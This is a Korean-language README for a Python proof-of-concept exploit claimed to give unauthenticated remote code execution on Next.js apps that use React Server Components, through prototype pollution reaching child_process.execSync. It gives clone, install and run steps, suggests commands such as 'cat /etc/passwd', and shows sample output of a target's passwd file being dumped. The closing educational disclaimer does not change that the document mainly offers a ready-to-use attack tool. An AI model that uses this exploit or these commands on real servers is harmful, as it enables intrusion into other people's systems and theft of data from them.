
React2Shell (CVE-2025-66478): Next.js 서버 컴포넌트의 치명적 원격 코드 실행(RCE)을 위한 파이썬 기반 개념 증명입니다. 대화형 CLI, 사용자 정의 페이로드 주입, 깔끔한 출력 형식을 제공합니다. 교육 연구 목적으로만 사용하십시오.
Next.js 원격 코드 실행 (RCE) - 서버 컴포넌트의 프로토타입 오염을 통한
이 저장소는 Next.js 애플리케이션 중 특정 버전의 React Server Components (RSC) 를 사용하는 애플리케이션에 영향을 미치는 심각한 취약점인 CVE-2025-66478 (일부 맥락에서 CVE-2025-55182 로도 참조됨)에 대한 개념 증명 (PoC) 을 포함합니다.
RSC의 직렬화 과정을 조작하여, 인증되지 않은 공격자가 프로토타입 오염 (__proto__:then) 을 통해 악성 페이로드를 주입할 수 있습니다. 이는 child_process.execSync를 통해 서버에서 임의의 시스템 명령 실행으로 이어질 수 있습니다.
개발자: ArkhamKnight47
multipart/form-data 페이로드를 자동으로 구성합니다.1:E{"digest":...} 제거).\n vs \r\n)를 처리합니다.requests 라이브러리# Clone the repository
git clone https://github.com/RavinduRathnayaka/CVE-2025-55182-PoC.git
cd CVE-2025-55182-PoC
# Install dependencies
pip install requests
python CVE-2025-66478.py
다음 항목을 입력하라는 메시지가 표시됩니다:
http://localhost:3000id, whoami, cat /etc/passwd[?] TARGET URL > http://192.168.1.5:3000
[?] COMMAND > cat /etc/passwd
[*] EXECUTING EXPLOIT...
[+] PAYLOAD SUCCESSFUL. OUTPUT BELOW:
============================================================
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
nextjs:x:1001:65533::/home/nextjs:/sbin/nologin
============================================================
이 도구는 교육 및 보안 연구 목적으로만 제공됩니다.
저자(ArkhamKnight47)는 이 코드의 오용에 대해 책임을 지지 않습니다. 소유하지 않거나 명시적 테스트 허가를 받지 않은 시스템에 대해 이 익스플로잇을 테스트하는 것은 불법적이고 비윤리적입니다.
책임감 있게 사용하십시오. 윤리적으로 배우십시오. 스택을 보호하십시오.